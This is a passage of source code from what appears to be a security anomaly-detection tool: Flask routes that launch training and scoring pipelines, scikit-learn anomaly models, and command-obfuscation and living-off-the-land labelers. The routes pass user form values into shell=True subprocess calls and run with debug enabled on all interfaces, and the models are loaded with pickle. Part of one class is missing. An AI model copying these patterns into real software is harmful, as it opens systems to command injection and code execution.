297 | print(output)
298 | # print(input_data)
299 | return render_template("config_text_edit.html", input=[output], input_data=input_data)
300 |
301 | elif output == None and text_box != None:
302 | data = request.form.to_dict()
303 | input = data['input']
304 | text_box = data['text_box']
305 |
306 | with open(data_path + input, 'w') as configfile:
307 | configfile.write(text_box)
308 | return ''
309 |
310 |
311 | @app.route('/osas/train_pipeline', methods=['GET', 'POST'])
312 | def train_pipeline():
313 | print(request.method)
314 | if request.method == 'GET':
315 | onlyfiles = [f for f in listdir(data_path) if isfile(join(data_path, f)) and '.conf' in f and '.model' not in f]
316 | files = onlyfiles
317 |
318 | onlyfiles_dataset = [f for f in listdir(data_path) if
319 | isfile(join(data_path, f)) and '.conf' not in f and '.model' not in f]
320 | dataset = onlyfiles_dataset
321 |
322 | return render_template("train_pipeline.html", files=files, len=len(files), dataset=dataset,
323 | len_dataset=len(dataset))
324 |
325 | if request.method == 'POST':
326 | input = request.form['input']
327 | input_conf = request.form['input_conf']
328 |
329 | output = request.form['output']
330 | print(input)
331 | print(output)
332 | if '.model' not in output:
333 | output += '.model'
334 |
335 | def inner():
336 | proc = subprocess.Popen([
337 | 'python3 osas/main/train_pipeline.py --input-file={} --conf-file={} --model-file={} 2>&1'.format(
338 | data_path + input, data_path + input_conf, data_path + output)], shell=True,
339 | stdout=subprocess.PIPE)
340 |
341 | for line in iter(proc.stdout.readline, ''):
342 | try:
343 | yield line.rstrip().decode('ascii') + ' \n'
344 | except:
345 | a = None
346 | poll = proc.poll()
347 | if poll is not None:
348 | yield 'DONE! \n'
349 | # yield 'go to http://127.0.0.1:8888/osas/run_pipeline'
350 | full_text = """go to http://127.0.0.1:8888/osas/run_pipeline
351 | """
356 | yield full_text
357 | break
358 |
359 | #
360 | return Response(inner(), mimetype='text/html')
361 |
362 |
363 | @app.route('/osas/run_pipeline', methods=['GET', 'POST'])
364 | def run_pipeline():
365 | print(request.method)
366 | if request.method == 'GET':
367 | onlyfiles = [f for f in listdir(data_path) if
368 | isfile(join(data_path, f)) and '.conf' in f and 'pipeline' not in f]
369 | files = onlyfiles
370 |
371 | onlyfiles_dataset = [f for f in listdir(data_path) if
372 | isfile(join(data_path, f)) and '.conf' not in f and '.model' not in f]
373 | dataset = onlyfiles_dataset
374 |
375 | onlyfiles_dataset = [f for f in listdir(data_path) if isfile(join(data_path, f)) and '.model' in f]
376 | pipeline = onlyfiles_dataset
377 |
378 | return render_template("run_pipeline.html", files=files, len=len(files), dataset=dataset,
379 | len_dataset=len(dataset), pipeline=pipeline, len_pipeline=len(pipeline))
380 |
381 | if request.method == 'POST':
382 | input = request.form['input']
383 | input_conf = request.form['input_conf']
384 | model_conf = request.form['model_conf']
385 |
386 | output = request.form['output']
387 | print(input)
388 | print(output)
389 | if '.csv' not in output:
390 | output += '.csv'
391 |
392 | def inner():
393 | proc = subprocess.Popen([
394 | 'python3 osas/main/run_pipeline.py --input-file={} --conf-file={} --model-file={} --output-file={} 2>&1'.format(
395 | data_path + input, data_path + input_conf, data_path + model_conf,
396 | data_path + output)], shell=True, stdout=subprocess.PIPE)
397 |
398 | for line in iter(proc.stdout.readline, ''):
399 | try:
400 | yield line.rstrip().decode('ascii') + ' \n'
401 | except:
402 | a = None
403 | poll = proc.poll()
404 | if poll is not None:
405 | yield 'DONE! \n'
406 | # yield 'go to kibana http://127.0.0.1:5601'
407 | full_text = """go to http://127.0.0.1:5601
408 | """
413 | yield full_text
414 |
415 | break
416 |
417 | #
418 | return Response(inner(), mimetype='text/html')
419 |
420 |
421 | @app.route('/osas/run_full_process', methods=['GET', 'POST'])
422 | def run_full_process():
423 | print(request.method)
424 | if request.method == 'GET':
425 | onlyfiles = [f for f in listdir(data_path) if
426 | isfile(join(data_path, f)) and '.conf' not in f and '.model' not in f]
427 | files = onlyfiles
428 |
429 | return render_template("run_full_process.html", files=files, len=len(files))
430 |
431 | if request.method == 'POST':
432 | input = request.form['input']
433 | output = request.form['output']
434 | print(input)
435 | print(output)
436 | if '.csv' not in output:
437 | output += '.csv'
438 |
439 | def inner():
440 | import datetime
441 | stamp = str(datetime.datetime.now())[0:19].replace(' ', '_').replace(':', '_')
442 | key = input.split('.')[0] + "_" + stamp
443 | commands = []
444 | commands.append(
445 | 'python3 osas/main/autoconfig.py --input-file={} --output-file={}.conf 2>&1'.format(data_path + input,
446 | data_path + key))
447 | commands.append(
448 | 'python3 osas/main/train_pipeline.py --input-file={} --conf-file={}.conf --model-file={}.model 2>&1'.format(
449 | data_path + input, data_path + key, data_path + key))
450 | commands.append(
451 | 'python3 osas/main/run_pipeline.py --input-file={} --conf-file={}.conf --model-file={}.model --output-file={} 2>&1'.format(
452 | data_path + input, data_path + key, data_path + key, data_path + output))
453 |
454 | for command in commands:
455 | yield command + ' \n' + ' \n'
456 | proc = subprocess.Popen([command], shell=True, stdout=subprocess.PIPE)
457 |
458 | for line in iter(proc.stdout.readline, ''):
459 |
460 | try:
461 | yield line.rstrip().decode('ascii') + ' \n'
462 | except:
463 | a = None
464 | poll = proc.poll()
465 | if poll is not None:
466 | yield 'DONE! \n'
467 | yield 'NEXT: \n'
468 | break
469 | yield 'go to kibana http://127.0.0.1:5601'
470 |
471 | #
472 | return Response(inner(), mimetype='text/html')
473 |
474 |
475 | app.run(port=8888, host='0.0.0.0', debug=True)
476 |
--------------------------------------------------------------------------------
/src/osas/core/anomaly.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | import sys
20 | import ast
21 | import numpy as np
22 | import tqdm
23 | from sklearn.preprocessing import MultiLabelBinarizer
24 | from sklearn.decomposition import TruncatedSVD
25 | from sklearn.neighbors import LocalOutlierFactor
26 | from sklearn.ensemble import IsolationForest
27 | import json
28 | import pickle
29 | import base64
30 | import importlib
31 |
32 | sys.path.append('')
33 | from osas.core.interfaces import AnomalyDetection, Datasource
34 |
35 |
36 | class IFAnomaly(AnomalyDetection):
37 | """
38 | Uses LOF to detect anomalies
39 | """
40 |
41 | def __init__(self):
42 | super().__init__()
43 | self._model = None
44 | self._data_encoder = None
45 | self._decompose = None
46 |
47 | def build_model(self, dataset: Datasource, incremental=False) -> dict:
48 | data_encoder = MultiLabelBinarizer()
49 | labels = []
50 | for item in dataset:
51 | labels.append(item['_labels'])
52 | data_encoded = data_encoder.fit_transform(labels)
53 | self._data_encoder = data_encoder
54 |
55 | decompose = TruncatedSVD(n_components=4, n_iter=7, random_state=42)
56 | data_decomposed = decompose.fit_transform(data_encoded)
57 | self._decompose = decompose
58 |
59 | iso_forest = IsolationForest(random_state=0, n_jobs=4)
60 | iso_forest.fit(data_decomposed)
61 |
62 | self._model = iso_forest
63 |
64 | model = {'encoder': self._data_encoder,
65 | 'SVD': self._decompose,
66 | 'iso_forest': self._model
67 | }
68 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
69 | model = {'model': out_model}
70 | return model
71 |
72 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
73 |
74 | labels = []
75 | for item in dataset:
76 | labels.append(item['_labels'])
77 | data_encoded = self._data_encoder.transform(labels)
78 | data_decomposed = self._decompose.transform(data_encoded)
79 | scores = self._model.score_samples(data_decomposed)
80 |
81 | return -scores
82 |
83 | @staticmethod
84 | def from_pretrained(pretrained: str) -> AnomalyDetection:
85 | tmp = json.loads(pretrained)
86 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
87 | model = IFAnomaly()
88 | model._data_encoder = pre_model['encoder']
89 | model._decompose = pre_model['SVD']
90 | model._model = pre_model['iso_forest']
91 |
92 | return model
93 |
94 |
95 | class LOFAnomaly(AnomalyDetection):
96 | """
97 | Uses LOF to detect anomalies
98 | """
99 |
100 | def __init__(self):
101 | super().__init__()
102 | self._model = None
103 | self._data_encoder = None
104 | self._decompose = None
105 |
106 | def build_model(self, dataset: Datasource, incremental=False) -> dict:
107 | data_encoder = MultiLabelBinarizer()
108 | labels = []
109 | for item in dataset:
110 | labels.append(item['_labels'])
111 | data_encoded = data_encoder.fit_transform(labels)
112 | self._data_encoder = data_encoder
113 |
114 | decompose = TruncatedSVD(n_components=4, n_iter=7, random_state=42)
115 | data_decomposed = decompose.fit_transform(data_encoded)
116 | self._decompose = decompose
117 |
118 | lof = LocalOutlierFactor(n_neighbors=10, n_jobs=4, novelty=True)
119 | lof.fit(data_decomposed)
120 |
121 | self._model = lof
122 |
123 | model = {'encoder': self._data_encoder,
124 | 'SVD': self._decompose,
125 | 'LOF': self._model
126 | }
127 |
128 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
129 | model = {'model': out_model}
130 | return model
131 |
132 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
133 |
134 | labels = []
135 | for item in dataset:
136 | labels.append(item['_labels'])
137 | data_encoded = self._data_encoder.transform(labels)
138 | data_decomposed = self._decompose.transform(data_encoded)
139 | scores = self._model.score_samples(data_decomposed)
140 |
141 | return -scores
142 |
143 | @staticmethod
144 | def from_pretrained(pretrained: str) -> AnomalyDetection:
145 | tmp = json.loads(pretrained)
146 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
147 | model = LOFAnomaly()
148 | model._data_encoder = pre_model['encoder']
149 | model._decompose = pre_model['SVD']
150 | model._model = pre_model['LOF']
151 |
152 | return model
153 |
154 |
155 | class SVDAnomaly(AnomalyDetection):
156 | """
157 | Uses an autoencoder to compute anomaly score
158 | """
159 |
160 | def __init__(self):
161 | super().__init__()
162 | self._data_encoder = None
163 | self._model = None
164 |
165 | def build_model(self, dataset: Datasource, incremental=False) -> dict:
166 |
167 | labels = []
168 | for item in dataset:
169 | tmp = []
170 | for label in item['_labels']:
171 | if isinstance(label, str):
172 | tmp.append(label)
173 | labels.append(tmp)
174 |
175 | if not incremental:
176 | data_encoder = MultiLabelBinarizer()
177 | data_encoded = data_encoder.fit_transform(labels)
178 | else:
179 | data_encoder = self._data_encoder
180 | data_encoded = data_encoder.transform(labels)
181 | self._data_encoder = data_encoder
182 | if not incremental:
183 | decompose = TruncatedSVD(n_components=4, n_iter=50, random_state=42)
184 | decompose.fit(data_encoded)
185 | else:
186 | decompose = self._model
187 | decompose.partial_fit(data_encoded)
188 |
189 | self._model = decompose
190 |
191 | model = {'encoder': self._data_encoder,
192 | 'SVD': self._model}
193 |
194 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
195 | model = {'model': out_model}
196 | return model
197 |
198 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
199 |
200 | labels = []
201 | for item in dataset:
202 | labels.append(item['_labels'])
203 | data_encoded = self._data_encoder.transform(labels)
204 | data_decomposed = self._model.transform(data_encoded)
205 | data_reconstruct = self._model.inverse_transform(data_decomposed)
206 |
207 | difference = data_encoded - data_reconstruct
208 | power = np.sum(difference ** 2, axis=1)
209 | error = np.sqrt(power)
210 |
211 | return error
212 |
213 | @staticmethod
214 | def from_pretrained(pretrained: str) -> AnomalyDetection:
215 | tmp = json.loads(pretrained)
216 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
217 | model = SVDAnomaly()
218 | model._data_encoder = pre_model['encoder']
219 | model._model = pre_model['SVD']
220 |
221 | return model
222 |
223 |
224 | class StatisticalNGramAnomaly(AnomalyDetection):
225 | """
226 | Uses an autoencoder to compute anomaly score
227 | """
228 |
229 | def __init__(self):
230 | super().__init__()
231 | self._model = None
232 |
233 | def build_model(self, dataset: Datasource, incremental=False) -> dict:
234 | if not incremental:
235 | model = {
236 | '1': {'TOTAL': 0},
237 | '2': {'TOTAL': 0},
238 | '3': {'TOTAL': 0}
239 | }
240 | else:
241 | model = self._model
242 | # for clarity, this code is written explicitly
243 | for item in tqdm.tqdm(dataset, ncols=100, desc="\tbuilding model"):
244 | tags = item['_labels']
245 | string_tags = []
246 | for tag in tags:
247 | if isinstance(tag, str):
248 | string_tags.append(tag)
249 | tags = string_tags
250 | tags = list(sorted(tags))
251 | # unigrams
252 | grams = model['1']
253 | for ii in range(len(tags)):
254 | key = '(' + str(tags[ii]) + ')'
255 | if key in grams:
256 | grams[key]['COUNT'] += 1
257 | else:
258 | grams[key] = {'COUNT': 1}
259 | grams['TOTAL'] += 1
260 |
261 | # bigrams
262 | grams = model['2']
263 |
264 | for ii in range(len(tags) - 1):
265 | for jj in range(ii + 1, len(tags)):
266 | key = '(' + str(tags[ii]) + ',' + str(tags[jj]) + ')'
267 | if key in grams:
268 | grams[key]['COUNT'] += 1
269 | else:
270 | grams[key] = {'COUNT': 1}
271 | grams['TOTAL'] += 1
272 |
273 | # trigrams
274 | grams = model['3']
275 |
276 | for ii in range(len(tags) - 2):
277 | for jj in range(ii + 1, len(tags) - 1):
278 | for kk in range(jj + 1, len(tags)):
279 | key = '(' + str(tags[ii]) + ',' + str(tags[jj]) + ',' + str(tags[kk]) + ')'
280 | if key in grams:
281 | grams[key]['COUNT'] += 1
282 | else:
283 | grams[key] = {'COUNT': 1}
284 | grams['TOTAL'] += 1
285 |
286 | # convert to probs and log-probs
287 | for g in ['1', '2', '3']:
288 | grams = model[g]
289 | total = grams['TOTAL']
290 | for key in grams:
291 | if key != 'TOTAL':
292 | grams[key]['PROB'] = grams[key]['COUNT'] / total
293 | grams[key]['NEG_LOG_PROB'] = -np.log(grams[key]['PROB'])
294 | self._model = model
295 |
296 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
297 | model = {'model': out_model}
298 | return model
299 |
300 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
301 |
302 | def _build_feats(tags):
303 | feats = []
304 | string_tags = []
305 | perp_score = 0
306 | for tag in tags:
307 | if isinstance(tag, str):
308 | string_tags.append(tag)
309 | else:
310 | perp_score += tag
311 | tags = string_tags
312 | tags = list(sorted(tags))
313 |
314 | for ii in range(len(tags)):
315 | feats.append([tags[ii]])
316 | for ii in range(len(tags) - 1):
317 | for jj in range(ii + 1, len(tags)):
318 | feats.append([tags[ii], tags[jj]])
319 |
320 | for ii in range(len(tags) - 2):
321 | for jj in range(ii + 1, len(tags) - 1):
322 | for kk in range(jj + 1, len(tags)):
323 | feats.append([tags[ii], tags[jj], tags[kk]])
324 | new_feats = []
325 | for feat in feats:
326 | mid = "(" + ",".join(feat) + ")"
327 | new_feats.append(mid)
328 | return new_feats, perp_score
329 |
330 | def _compute_score(ngram2score, tags, handle_unseen=True):
331 | feats, perp_score = _build_feats(tags)
332 |
333 | score = 0
334 | for feat in feats:
335 | found = False
336 | if feat in ngram2score['1']:
337 | score += ngram2score['1'][feat]['NEG_LOG_PROB']
338 | found = True
339 | elif feat in ngram2score['2']:
340 | score += ngram2score['2'][feat]['NEG_LOG_PROB']
341 | found = True
342 | elif feat in ngram2score['3']:
343 | score += ngram2score['3'][feat]['NEG_LOG_PROB']
344 | found = True
345 | if not found:
346 | if handle_unseen:
347 | import math
348 | score += -math.log(1e-8)
349 | return score + perp_score
350 |
351 | scores = []
352 | if verbose:
353 | pgb = tqdm.tqdm(dataset, ncols=100, desc="\tscoring data")
354 | else:
355 | pgb = dataset
356 | for item in pgb:
357 | scores.append(_compute_score(self._model, item['_labels']))
358 |
359 | return scores
360 |
361 | @staticmethod
362 | def from_pretrained(pretrained: str) -> AnomalyDetection:
363 | tmp = json.loads(pretrained)
364 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
365 | model = StatisticalNGramAnomaly()
366 | model._model = pre_model
367 |
368 | return model
369 |
370 |
371 | class SupervisedClassifierAnomaly(AnomalyDetection):
372 | def __init__(self):
373 | super().__init__()
374 | self.BINARY_GROUND_TRUTHS1 = {'clean', 'bad'}
375 | self.BINARY_GROUND_TRUTHS2 = {0, 1}
376 | self.BINARY_IND_TO_GROUND_TRUTH1 = ['clean', 'bad']
377 | self.BINARY_IND_TO_GROUND_TRUTH2 = [0, 1]
378 |
379 | self._model = None
380 | self._encoder = None
381 | self._is_binary_preds = False
382 | self._ind_to_ground_truth = None
383 |
384 | def build_model(self, dataset: Datasource, ground_truth_column: str, classifier: str, init_args: dict,
385 | incremental=False) -> dict:
386 | labels = []
387 | ground_truth_values = set()
388 | for item in dataset:
389 | labels.append(item['_labels'])
390 | ground_truth_values.add(item[ground_truth_column])
391 | if not incremental:
392 | encoder = MultiLabelBinarizer()
393 | labels_enc = encoder.fit_transform(labels)
394 | else:
395 | encoder = self._encoder
396 | labels_enc = encoder.transform(labels)
397 |
398 | # set binary preds
399 | if ground_truth_values == self.BINARY_GROUND_TRUTHS1:
400 | # all grouth truth labels either clean or bad
401 | self._is_binary_preds = True
402 | ind_to_ground_truth = self.BINARY_IND_TO_GROUND_TRUTH1 # set bad to index 1
403 | elif ground_truth_values == self.BINARY_GROUND_TRUTHS2:
404 | # all grouth truth labels either 0 or 1
405 | self._is_binary_preds = True
406 | ind_to_ground_truth = self.BINARY_IND_TO_GROUND_TRUTH2 # set 1 to index 1
407 | else:
408 | # ground truth labels can be anything
409 | self._is_binary_preds = False
410 | ind_to_ground_truth = list(ground_truth_values)
411 |
412 | # convert ground truth values to indices
413 | ground_truth_to_ind = dict()
414 | for i in range(len(ind_to_ground_truth)):
415 | ground_truth_to_ind[ind_to_ground_truth[i]] = i
416 | model_ground_truths = []
417 | for item in dataset:
418 | gt = item[ground_truth_column]
419 | model_ground_truths.append(ground_truth_to_ind[gt])
420 |
421 | # get the classifier
422 | if not incremental:
423 | try:
424 | clf_parts = classifier.split('.')
425 | assert clf_parts[0] == 'sklearn'
426 | sk_pkg = importlib.import_module('{:s}.{:s}'.format(clf_parts[0], clf_parts[1]))
427 | clf_class = getattr(sys.modules[sk_pkg.__name__], clf_parts[2])
428 | except:
429 | raise Exception(
430 | 'expected classifier to be in sklearn package format: sklearn.. (ex. sklearn.linear_model.LogisiticRegression)')
431 | clf = clf_class(**init_args) # dict unpacking for init args
432 | clf.fit(labels_enc, model_ground_truths)
433 | else:
434 | clf = self._model
435 | clf.partial_fit(labels_enc, model_ground_truths)
436 |
437 | # return model
438 | self._encoder = encoder
439 | self._ind_to_ground_truth = ind_to_ground_truth
440 | self._model = clf
441 | model = {
442 | 'encoder': self._encoder,
443 | 'ind_to_ground_truth': ind_to_ground_truth,
444 | 'is_binary_preds': self._is_binary_preds,
445 | 'classifier': self._model
446 | }
447 | out_model = base64.b64encode(pickle.dumps(model)).decode('ascii')
448 | model = {'model': out_model}
449 | return model
450 |
451 | def __call__(self, dataset: Datasource, verbose=True) -> [float]:
452 | labels = []
453 | for item in dataset:
454 | labels.append(item['_labels'])
455 | labels_enc = self._encoder.transform(labels)
456 |
457 | preds = self._model.predict_proba(labels_enc)
458 | if self._is_binary_preds:
459 | # return the "bad" prob
460 | preds = [pred[1] for pred in preds]
461 | else:
462 | # return the class with most prob
463 | preds = [self._ind_to_ground_truth[np.argmax(pred)] for pred in preds]
464 | return preds
465 |
466 | @staticmethod
467 | def from_pretrained(pretrained: str) -> AnomalyDetection:
468 | tmp = json.loads(pretrained)
469 | pre_model = pickle.loads(base64.b64decode(tmp['model']))
470 | model = SupervisedClassifierAnomaly()
471 | model._encoder = pre_model['encoder']
472 | model._ind_to_ground_truth = pre_model['ind_to_ground_truth']
473 | model._is_binary_preds = pre_model['is_binary_preds']
474 | model._model = pre_model['classifier']
475 |
476 | return model
477 |
478 |
479 | if __name__ == "__main__":
480 | from osas.data.datasources import CSVDataSource
481 |
482 | data_source = CSVDataSource('corpus/hubble_test_tags.csv')
483 |
484 |
485 | def coverter(x):
486 | return ast.literal_eval(x)
487 |
488 |
489 | data_source._data['_labels'] = data_source._data['_labels'].apply(lambda x: coverter(x))
490 |
491 | model = StatisticalNGramAnomaly()
492 | tmp = model.build_model(data_source)
493 | tmp = json.dumps(tmp)
494 | model2 = StatisticalNGramAnomaly.from_pretrained(tmp)
495 | scores = model(data_source)
496 |
497 | scores2 = model2(data_source)
498 | import operator
499 |
500 | dd = {}
501 | from ipdb import set_trace
502 |
503 | for ex, score in zip(data_source, scores):
504 | dd[",".join(ex['_labels'])] = score
505 | sorted_x = sorted(dd.items(), key=operator.itemgetter(1))
506 |
507 | set_trace()
508 |
--------------------------------------------------------------------------------
/src/osas/core/label_generators.py:
--------------------------------------------------------------------------------
1 | #
2 | # Authors: Security Intelligence Team within the Security Coordination Center
3 | #
4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
5 | #
6 | # Licensed under the Apache License, Version 2.0 (the "License");
7 | # you may not use this file except in compliance with the License.
8 | # You may obtain a copy of the License at
9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 |
19 | from cProfile import label
20 | import sys
21 | import pandas as pd
22 | import numpy as np
23 | import re
24 | import math
25 |
26 | sys.path.append('')
27 | import json
28 | from osas.core.interfaces import LabelGenerator, Datasource
29 | from osas.core.utils import Tokenizer
30 | from enum import Enum
31 |
32 | from lol.api import LOLC
33 | from lol.api import PlatformType
34 | from obfuscation_detection import ObfuscationDetectionClassifier
35 |
36 |
37 | class ObfuscationField(LabelGenerator):
38 | """
39 | This type of Label generator handles fields that contain Linux/Windows commands. It uses machine learning
40 | to predict if a command is obfuscated or not.
41 | """
42 |
43 | def __init__(self, field_name: str = ''):
44 | self._model = {
45 | 'field_name': field_name,
46 | }
47 | self._classifier = ObfuscationDetectionClassifier()
48 |
49 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
50 | return self._model
51 |
52 | @staticmethod
53 | def from_pretrained(pretrained: str) -> object:
54 | lg = ObfuscationField()
55 | lg._model = json.loads(pretrained)
56 | lg._classifier = ObfuscationDetectionClassifier()
57 | return lg
58 |
59 | def __call__(self, object: dict) -> [str]:
60 | command = object[self._model['field_name']]
61 | classification = int(self._classifier.predict([command])[0])
62 | if classification == 1:
63 | ret = 'OBFUSCATED'
64 | else:
65 | ret = 'NOT OBFUSCATED'
66 | return [ret]
67 |
68 |
69 | class LOLFieldPlatform(Enum):
70 | LINUX = PlatformType.LINUX
71 | WINDOWS = PlatformType.WINDOWS
72 |
73 |
74 | class LOLField(LabelGenerator):
75 | """
76 | This type of LabelGenerator handles fields that contain Linux/Windows commands. It uses MachineLearning to
77 | predict if a command is part of a Living of the Land attack
78 | """
79 |
80 | def __init__(self, field_name: str = '', platform: LOLFieldPlatform = LOLFieldPlatform.LINUX, return_labels=False):
81 | """
82 | Constructor
83 | :param field_name: what field to look for in the data object
84 | :param platform: chose what model to use Windows/Linux
85 | :param return_labels: return all generated labels or just the status (BAD, GOOD, NEUTRAL)
86 | """
87 | if platform == 'linux':
88 | platform = PlatformType.LINUX
89 | elif platform == 'windows':
90 | platform = PlatformType.WINDOWS
91 | platform_str = str(platform)
92 | self._model = {
93 | 'field_name': field_name,
94 | 'platform': platform_str,
95 | 'return_labels': return_labels
96 | }
97 | self._classifier = LOLC(platform=platform)
98 |
99 | def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
100 | return self._model
101 |
102 | @staticmethod
103 | def from_pretrained(pretrained: str) -> object:
104 | lg = LOLField()
105 | lg._model = json.loads(pretrained)
106 | platform = PlatformType.LINUX
107 | if lg._model['platform'] == 'PlatformType.WINDOWS':
108 | platform = PlatformType.WINDOWS
109 | lg._classifier = LOLC(platform=platform)
110 | return lg
111 |
112 | def __call__(self, object: dict):
113 | command = object[self._model['field_name']]
114 | status, labels = self._classifier(command)
115 | ret_labels = [status]
116 | if self._model['return_labels']:
117 | for label in labels:
118 | ret_labels.append(label)
119 | return ret_labels
120 |
121 |
122 | class NumericField(LabelGenerator):
123 | """
124 | This type of LabelGenerator handles numerical fields. It computes the mean and standard deviation and generates
125 | labels according to the distance between the current value and the mean value
126 | (value<=sigma NORMAL, sigma dict:
174 | incremental = False
175 | if self._model['mean'] is not None:
176 | ex_mean = self._model['mean']
177 | ex_stdev = self._model['std_dev']
178 | ex_count = self._model['count']
179 | incremental = True
180 | group_by = self._model['group_by']
181 | if group_by is None:
182 | mean = 0
183 | stdev = 0
184 | count = 0
185 | else:
186 | mean = {}
187 | stdev = {}
188 | count = {}
189 | # mean
190 | for item in dataset:
191 | cc = 1
192 | if count_column is not None:
193 | cc = int(item[count_column])
194 | if group_by is None:
195 | mean += item[self._model['field_name']] * cc
196 | count += cc
197 | else:
198 | key = self._get_group_by_value(item, group_by)
199 | if key not in mean:
200 | mean[key] = 0
201 | stdev[key] = 0
202 | count[key] = 0
203 | mean[key] += item[self._model['field_name']] * cc
204 | count[key] += cc
205 |
206 | if group_by is None:
207 | mean /= count
208 | else:
209 | for key in mean:
210 | mean[key] /= count[key]
211 | # stdev
212 | for item in dataset:
213 | cc = 1
214 | if count_column is not None:
215 | cc = int(item[count_column])
216 | if group_by is None:
217 | stdev += ((item[self._model['field_name']] - mean) ** 2) * cc
218 | else:
219 | key = self._get_group_by_value(item, group_by)
220 | stdev[key] += ((item[self._model['field_name']] - mean[key]) ** 2) * cc
221 |
222 | if group_by is None:
223 | stdev /= count
224 | stdev = math.sqrt(stdev)
225 | else:
226 | for key in stdev:
227 | stdev[key] /= count[key]
228 | stdev[key] = math.sqrt(stdev[key])
229 |
230 | # update if incremental
231 | if incremental:
232 | if group_by is None:
233 | new_mean = (ex_mean * ex_count + mean * count) / (ex_count + count)
234 | new_stdev = (((ex_stdev ** 2) * ex_count) + ((stdev ** 2) * count)) / (ex_count + count)
235 | new_count = ex_count + count
236 | else:
237 | new_mean = {}
238 | new_stdev = {}
239 | new_count = {}
240 | for key in mean:
241 | if key in ex_mean:
242 | new_mean[key] = (ex_mean[key] * ex_count[key] + mean[key] * count[key]) / (
243 | ex_count[key] + count[key])
244 | new_stdev[key] = (((ex_stdev[key] ** 2) * ex_count[key]) + ((stdev[key] ** 2) * count[key])) / (
245 | ex_count[key] + count[key])
246 | new_count[key] = ex_count[key] + count[key]
247 | else:
248 | new_mean[key] = mean[key]
249 | new_stdev[key] = stdev[key]
250 | new_count[key] = count[key]
251 | # transfer ex-values
252 | for key in ex_mean:
253 | if key not in mean:
254 | new_mean[key] = ex_mean[key]
255 | new_stdev[key] = ex_stdev[key]
256 | new_count[key] = ex_count[key]
257 |
258 | mean = new_mean
259 | stdev = new_stdev
260 | count = new_count
261 | # store
262 | self._model['mean'] = mean
263 | self._model['std_dev'] = stdev
264 | self._model['count'] = count
265 | # check sanity and warn user
266 | font_style = '\033[93m'
267 | mean_is_zero = False
268 | stdev_is_zero = False
269 | if self._model['group_by'] is None:
270 | if self._model['mean'] == 0:
271 | mean_is_zero = True
272 | if self._model['std_dev'] == 0:
273 | stdev_is_zero = True
274 | else:
275 | for key in self._model['mean']:
276 | if self._model['mean'][key] == 0:
277 | mean_is_zero = True
278 | if self._model['std_dev'][key] == 0:
279 | stdev_is_zero = True
280 | if mean_is_zero and self._model['stdev'] == False:
281 | sys.stdout.write('\t{0}::WARNING:You have a mean of 0. Any deviation will be flagged\n'.format(font_style))
282 | if stdev_is_zero and self._model['stdev'] == True:
283 | sys.stdout.write(
284 | '\t{0}::WARNING:You have a standard deviation of 0. Any deviation will be flagged\n'.format(font_style))
285 |
286 | return self._model
287 |
288 | # def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
289 | # from osas.data.datasources import CSVDataColumn
290 | # incremental = False
291 | # if self._model['mean'] is not None:
292 | # ex_mean = self._model['mean']
293 | # ex_stdev = self._model['std_dev']
294 | # ex_count = self._model['count']
295 | # incremental = True
296 | # if count_column is None:
297 | # mean = CSVDataColumn(dataset[self._model['field_name']]).mean()
298 | # stdev = CSVDataColumn(dataset[self._model['field_name']]).std()
299 | # count = len(dataset[self._model['field_name']])
300 | # self._model['mean'] = mean
301 | # self._model['std_dev'] = stdev
302 | # self._model['count'] = count
303 | # else:
304 | # mean = CSVDataColumn(dataset[self._model['field_name']] * dataset[count_column]).sum()
305 | # stdev = ((CSVDataColumn(dataset[self._model['field_name']] * dataset[count_column]) - mean) ** 2).sum()
306 | # count = dataset[count_column].sum()
307 | # mean = mean / count
308 | # stdev = math.sqrt(stdev / count)
309 | #
310 | # self._model['mean'] = mean
311 | # self._model['std_dev'] = stdev
312 | # self._model['count'] = count
313 | #
314 | # if incremental:
315 | # new_count = ex_count + count
316 | # new_mean = (mean * count + ex_mean * ex_count) / new_count
317 | # new_stdev = math.sqrt(((ex_stdev ** 2) * ex_count + (stdev ** 2) * count) / new_count)
318 | # self._model['mean'] = new_mean
319 | # self._model['std_dev'] = new_stdev
320 | # self._model['count'] = new_count
321 | #
322 | # return self._model
323 |
324 | def _get_labels(self, cur_value, mean_val, std_val, stdev, stdev_borderline_threshold,
325 | stdev_outlier_threshold, spike, spike_inverse, spike_borderline_threshold,
326 | spike_outlier_threshold, label_for_normal):
327 | labels = []
328 | if stdev:
329 | if std_val == 0:
330 | std_val = 0.01
331 | stdev_ratio = abs(cur_value - mean_val) / std_val
332 |
333 | # if using both stdev and spike, calculate a spike from the stdev
334 | if stdev and spike != 'none':
335 | if not spike_inverse:
336 | mean_val = mean_val + std_val
337 | else:
338 | mean_val = mean_val - std_val
339 |
340 | if spike == 'ratio':
341 | if not spike_inverse:
